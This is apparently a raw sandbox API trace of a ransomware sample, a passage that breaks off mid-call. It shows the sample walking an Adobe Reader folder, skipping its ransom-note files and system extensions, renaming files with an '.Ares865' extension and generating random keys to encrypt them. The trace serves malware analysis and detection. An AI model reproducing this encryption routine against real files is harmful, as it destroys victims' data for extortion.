RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.415] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.416] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.416] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.417] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b80, lpName=0x0) returned 0x170 [0154.418] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b80) returned 0x190000 [0154.419] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.420] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.420] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.420] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.420] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.421] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.421] CloseHandle (hObject=0x170) returned 1 [0154.421] CloseHandle (hObject=0x118) returned 1 [0154.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.421] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.421] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeSKY.htm", cAlternateFileName="README~2.HTM")) returned 1 [0154.421] lstrcmpiW (lpString1="ReadMeSKY.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.421] lstrcmpiW (lpString1="ReadMeSKY.htm", lpString2="aoldtz.exe") returned 1 [0154.422] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeSKY.htm" | out: lpString1="ReadMeSKY.htm") returned="ReadMeSKY.htm" [0154.422] lstrlenW (lpString="ReadMeSKY.htm") returned 13 [0154.422] lstrlenW (lpString="Ares865") returned 7 [0154.422] lstrcmpiW (lpString1="SKY.htm", lpString2="Ares865") returned 1 [0154.422] lstrlenW (lpString=".dll") returned 4 [0154.422] lstrcmpiW (lpString1="ReadMeSKY.htm", lpString2=".dll") returned 1 [0154.422] lstrlenW (lpString=".lnk") returned 4 [0154.422] lstrcmpiW (lpString1="ReadMeSKY.htm", lpString2=".lnk") returned 1 [0154.422] lstrlenW (lpString=".ini") returned 4 [0154.422] lstrcmpiW (lpString1="ReadMeSKY.htm", lpString2=".ini") returned 1 [0154.422] lstrlenW (lpString=".sys") returned 4 [0154.422] lstrcmpiW (lpString1="ReadMeSKY.htm", lpString2=".sys") returned 1 [0154.422] lstrlenW (lpString="ReadMeSKY.htm") returned 13 [0154.422] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.Ares865") returned 62 [0154.422] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm.ares865"), dwFlags=0x1) returned 1 [0154.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.425] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17335) returned 1 [0154.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.425] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.426] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.426] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.426] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x46c0, lpName=0x0) returned 0x170 [0154.427] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x46c0) returned 0x190000 [0154.429] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.430] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.430] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.430] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.430] CloseHandle (hObject=0x170) returned 1 [0154.430] CloseHandle (hObject=0x118) returned 1 [0154.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.431] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4995, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeUKR.htm", cAlternateFileName="README~1.HTM")) returned 1 [0154.431] lstrcmpiW (lpString1="ReadMeUKR.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.431] lstrcmpiW (lpString1="ReadMeUKR.htm", lpString2="aoldtz.exe") returned 1 [0154.431] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeUKR.htm" | out: lpString1="ReadMeUKR.htm") returned="ReadMeUKR.htm" [0154.431] lstrlenW (lpString="ReadMeUKR.htm") returned 13 [0154.431] lstrlenW (lpString="Ares865") returned 7 [0154.431] lstrcmpiW (lpString1="UKR.htm", lpString2="Ares865") returned 1 [0154.431] lstrlenW (lpString=".dll") returned 4 [0154.431] lstrcmpiW (lpString1="ReadMeUKR.htm", lpString2=".dll") returned 1 [0154.431] lstrlenW (lpString=".lnk") returned 4 [0154.431] lstrcmpiW (lpString1="ReadMeUKR.htm", lpString2=".lnk") returned 1 [0154.431] lstrlenW (lpString=".ini") returned 4 [0154.431] lstrcmpiW (lpString1="ReadMeUKR.htm", lpString2=".ini") returned 1 [0154.431] lstrlenW (lpString=".sys") returned 4 [0154.432] lstrcmpiW (lpString1="ReadMeUKR.htm", lpString2=".sys") returned 1 [0154.432] lstrlenW (lpString="ReadMeUKR.htm") returned 13 [0154.432] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.Ares865") returned 62 [0154.432] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm.ares865"), dwFlags=0x1) returned 1 [0154.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.434] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18837) returned 1 [0154.434] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.434] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.434] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.435] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.435] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.435] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.435] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4ca0, lpName=0x0) returned 0x170 [0154.437] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4ca0) returned 0x190000 [0154.438] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.439] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.439] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.440] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.440] CloseHandle (hObject=0x170) returned 1 [0154.440] CloseHandle (hObject=0x118) returned 1 [0154.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.440] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0154.440] lstrcmpiW (lpString1="Resource", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.440] lstrcmpiW (lpString1="Resource", lpString2="aoldtz.exe") returned 1 [0154.441] lstrcpyW (in: lpString1=0x2cce452, lpString2="Resource" | out: lpString1="Resource") returned="Resource" [0154.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0154.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d2ef0 [0154.441] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0154.441] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e45000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e45000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup Files", cAlternateFileName="SETUPF~1")) returned 1 [0154.441] lstrcmpiW (lpString1="Setup Files", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.441] lstrcmpiW (lpString1="Setup Files", lpString2="aoldtz.exe") returned 1 [0154.441] lstrcpyW (in: lpString1=0x2cce452, lpString2="Setup Files" | out: lpString1="Setup Files") returned="Setup Files" [0154.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0154.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2e4710 [0154.441] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0154.441] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vigtigt.htm", cAlternateFileName="")) returned 1 [0154.441] lstrcmpiW (lpString1="Vigtigt.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.441] lstrcmpiW (lpString1="Vigtigt.htm", lpString2="aoldtz.exe") returned 1 [0154.441] lstrcpyW (in: lpString1=0x2cce452, lpString2="Vigtigt.htm" | out: lpString1="Vigtigt.htm") returned="Vigtigt.htm" [0154.441] lstrlenW (lpString="Vigtigt.htm") returned 11 [0154.441] lstrlenW (lpString="Ares865") returned 7 [0154.442] lstrcmpiW (lpString1="igt.htm", lpString2="Ares865") returned 1 [0154.442] lstrlenW (lpString=".dll") returned 4 [0154.442] lstrcmpiW (lpString1="Vigtigt.htm", lpString2=".dll") returned 1 [0154.442] lstrlenW (lpString=".lnk") returned 4 [0154.442] lstrcmpiW (lpString1="Vigtigt.htm", lpString2=".lnk") returned 1 [0154.442] lstrlenW (lpString=".ini") returned 4 [0154.442] lstrcmpiW (lpString1="Vigtigt.htm", lpString2=".ini") returned 1 [0154.442] lstrlenW (lpString=".sys") returned 4 [0154.442] lstrcmpiW (lpString1="Vigtigt.htm", lpString2=".sys") returned 1 [0154.442] lstrlenW (lpString="Vigtigt.htm") returned 11 [0154.442] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.Ares865") returned 60 [0154.442] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm.ares865"), dwFlags=0x1) returned 1 [0154.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.445] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16833) returned 1 [0154.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.445] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.446] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.446] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.446] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44d0, lpName=0x0) returned 0x170 [0154.448] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44d0) returned 0x190000 [0154.449] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.450] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.450] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0154.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0154.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.450] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.451] CloseHandle (hObject=0x170) returned 1 [0154.451] CloseHandle (hObject=0x118) returned 1 [0154.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.451] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Viktig.htm", cAlternateFileName="")) returned 1 [0154.451] lstrcmpiW (lpString1="Viktig.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.451] lstrcmpiW (lpString1="Viktig.htm", lpString2="aoldtz.exe") returned 1 [0154.451] lstrcpyW (in: lpString1=0x2cce452, lpString2="Viktig.htm" | out: lpString1="Viktig.htm") returned="Viktig.htm" [0154.451] lstrlenW (lpString="Viktig.htm") returned 10 [0154.451] lstrlenW (lpString="Ares865") returned 7 [0154.451] lstrcmpiW (lpString1="tig.htm", lpString2="Ares865") returned 1 [0154.451] lstrlenW (lpString=".dll") returned 4 [0154.451] lstrcmpiW (lpString1="Viktig.htm", lpString2=".dll") returned 1 [0154.452] lstrlenW (lpString=".lnk") returned 4 [0154.452] lstrcmpiW (lpString1="Viktig.htm", lpString2=".lnk") returned 1 [0154.452] lstrlenW (lpString=".ini") returned 4 [0154.452] lstrcmpiW (lpString1="Viktig.htm", lpString2=".ini") returned 1 [0154.452] lstrlenW (lpString=".sys") returned 4 [0154.452] lstrcmpiW (lpString1="Viktig.htm", lpString2=".sys") returned 1 [0154.452] lstrlenW (lpString="Viktig.htm") returned 10 [0154.452] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.Ares865") returned 59 [0154.452] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm.ares865"), dwFlags=0x1) returned 1 [0154.454] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.454] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16818) returned 1 [0154.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.455] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.455] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.455] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.455] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44c0, lpName=0x0) returned 0x170 [0154.457] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44c0) returned 0x190000 [0154.459] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: 